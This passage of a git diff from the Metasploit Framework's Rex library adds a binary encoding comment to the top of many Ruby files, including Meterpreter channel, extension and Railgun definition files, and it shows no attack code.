+# -*- coding: binary -*-
module Rex
module PeScan
module Search
diff --git a/lib/rex/platforms.rb b/lib/rex/platforms.rb
index de1c712ef7..c6d29dfc7f 100644
--- a/lib/rex/platforms.rb
+++ b/lib/rex/platforms.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/platforms/windows'
diff --git a/lib/rex/platforms/windows.rb b/lib/rex/platforms/windows.rb
index 72a793e865..85011d20b8 100644
--- a/lib/rex/platforms/windows.rb
+++ b/lib/rex/platforms/windows.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Platforms
module Windows
diff --git a/lib/rex/poly.rb b/lib/rex/poly.rb
index a1b957128f..7e3ebc6db0 100644
--- a/lib/rex/poly.rb
+++ b/lib/rex/poly.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/block.rb b/lib/rex/poly/block.rb
index 1239567e19..1b67290465 100644
--- a/lib/rex/poly/block.rb
+++ b/lib/rex/poly/block.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/register.rb b/lib/rex/poly/register.rb
index 08ed820d55..a7f38b4074 100644
--- a/lib/rex/poly/register.rb
+++ b/lib/rex/poly/register.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Poly
diff --git a/lib/rex/poly/register/x86.rb b/lib/rex/poly/register/x86.rb
index 7137cd03ad..7cdff36f61 100644
--- a/lib/rex/poly/register/x86.rb
+++ b/lib/rex/poly/register/x86.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/arch/x86'
module Rex
diff --git a/lib/rex/post.rb b/lib/rex/post.rb
index 0ff22b7d77..5cb7c96d74 100644
--- a/lib/rex/post.rb
+++ b/lib/rex/post.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# General independent containers
require 'rex/post/permission'
diff --git a/lib/rex/post/dir.rb b/lib/rex/post/dir.rb
index 7886661a0e..8c73148e6b 100644
--- a/lib/rex/post/dir.rb
+++ b/lib/rex/post/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/file.rb b/lib/rex/post/file.rb
index 7ec3ce3e48..dd26dbdd8b 100644
--- a/lib/rex/post/file.rb
+++ b/lib/rex/post/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/io'
diff --git a/lib/rex/post/file_stat.rb b/lib/rex/post/file_stat.rb
index d2a3ff8e03..c5ecee2b8a 100644
--- a/lib/rex/post/file_stat.rb
+++ b/lib/rex/post/file_stat.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# This is just a container class basically, that acts like File::Struct
diff --git a/lib/rex/post/io.rb b/lib/rex/post/io.rb
index 582f90a903..17e71d1d76 100644
--- a/lib/rex/post/io.rb
+++ b/lib/rex/post/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter.rb b/lib/rex/post/meterpreter.rb
index 8c5da48ad8..47463ac399 100644
--- a/lib/rex/post/meterpreter.rb
+++ b/lib/rex/post/meterpreter.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/ui/console'
diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb
index 85b7f81eea..7424609c44 100644
--- a/lib/rex/post/meterpreter/channel.rb
+++ b/lib/rex/post/meterpreter/channel.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/inbound_packet_handler'
diff --git a/lib/rex/post/meterpreter/channel_container.rb b/lib/rex/post/meterpreter/channel_container.rb
index 9e78890f55..0bb689d667 100644
--- a/lib/rex/post/meterpreter/channel_container.rb
+++ b/lib/rex/post/meterpreter/channel_container.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/channels/pool.rb b/lib/rex/post/meterpreter/channels/pool.rb
index da39e6bdb7..37fe29437b 100644
--- a/lib/rex/post/meterpreter/channels/pool.rb
+++ b/lib/rex/post/meterpreter/channels/pool.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/channels/pools/file.rb b/lib/rex/post/meterpreter/channels/pools/file.rb
index eb5693d311..427e4c07b0 100644
--- a/lib/rex/post/meterpreter/channels/pools/file.rb
+++ b/lib/rex/post/meterpreter/channels/pools/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channels/pool'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
diff --git a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
index cc72ed8d7a..5c08ece7d3 100644
--- a/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
+++ b/lib/rex/post/meterpreter/channels/pools/stream_pool.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/channels/pool'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb
index aadab14540..c9635ee505 100644
--- a/lib/rex/post/meterpreter/channels/stream.rb
+++ b/lib/rex/post/meterpreter/channels/stream.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/io/stream_abstraction'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb
index 3595f40ea9..cc5591b8e6 100644
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'socket'
require 'openssl'
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 313039beee..823dc8248c 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/extension'
diff --git a/lib/rex/post/meterpreter/dependencies.rb b/lib/rex/post/meterpreter/dependencies.rb
index 47852c5936..3aa429be7b 100644
--- a/lib/rex/post/meterpreter/dependencies.rb
+++ b/lib/rex/post/meterpreter/dependencies.rb
@@ -1,3 +1,4 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/permission'
diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb
index 545f6abfb6..940f57d556 100644
--- a/lib/rex/post/meterpreter/extension.rb
+++ b/lib/rex/post/meterpreter/extension.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb
index 9039d9af6f..bd9ad1b388 100644
--- a/lib/rex/post/meterpreter/extensions/espia/espia.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/espia/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
index c9ff5ff0fc..1ae21b9bb2 100644
--- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
index 409b48f13d..9d55341802 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/incognito/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
index ce5ecc8861..586e69171a 100644
--- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
index 51369931c8..3d9cccc549 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/lanattacks/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
index 1da165d755..9cb61b5403 100644
--- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
index 5f3101e0b1..ce58a539e9 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/networkpug/tlv'
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
index d2d72e24ab..2712727e97 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/priv/fs.rb b/lib/rex/post/meterpreter/extensions/priv/fs.rb
index 93302ec8ea..bbb2a8914f 100644
--- a/lib/rex/post/meterpreter/extensions/priv/fs.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/fs.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/priv/passwd.rb b/lib/rex/post/meterpreter/extensions/priv/passwd.rb
index 927b5ffa30..57cf5a8fb7 100644
--- a/lib/rex/post/meterpreter/extensions/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/passwd.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index c872bb766b..cc976d0752 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/priv/tlv'
require 'rex/post/meterpreter/extensions/priv/passwd'
diff --git a/lib/rex/post/meterpreter/extensions/priv/tlv.rb b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
index 30ec0837ec..92cf1b7f4a 100644
--- a/lib/rex/post/meterpreter/extensions/priv/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
index e126300e25..c9fe7bb416 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/sniffer/tlv'
require 'rex/proto/smb/utils'
diff --git a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
index 6daeb182eb..67f076f443 100644
--- a/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
index 81f2280421..332dda8a76 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
###
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
index 0227430d91..de372cf0e9 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/dir'
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index e407aa6422..53226ffa53 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/file'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
index 6be7df6943..830b3552e5 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/file_stat'
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
index da195893e9..9a5c271f70 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/io'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
index c589375556..1af178a8f4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/route'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
index d0008b3ec6..66c9557fa5 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'ipaddr'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
index 623e3f11a5..039187a1d4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'ipaddr'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
index a95ac226bd..793c03aa6c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
index 364a483815..f4652142e6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'thread'
require 'rex/post/meterpreter/channel'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
index 2b2bade265..1b2fc829b7 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
index fc6f8e019e..4947d60d79 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
index cd5baf30b5..c999567062 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__)))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
index bc68a23acb..6a8470400a 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager'
require 'thread'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
index c091744902..84ca9f3112 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
index a7953302ef..5619a207cb 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
index 2b18f345bb..63fae0af3e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
index 01c309a9c9..fd3ad12684 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
index 10e0e3c3dd..7edeb85a13 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
index 54e0c25a11..aae31ab2ec 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
index 03eab8ef5f..403b6f3c99 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
index ad62b0f5f3..6ddc9c1f07 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
index fe62795b30..6d65b189af 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
index 639245e11c..3492cf9914 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
index 207929850e..9d642dbaac 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
index 704b28698d..0c3d77215c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
index a35e0a3fcc..9da9a9c38e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
index 0c4159cb57..ec4990551e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
index 3876e421f5..36f102e294 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
index 04b1bcb1e8..3e62400638 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
index fc8fe2ee74..ccae7ccabc 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
index bfa7c982aa..cc12f9202d 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
index 931babf0c7..22fced4270 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
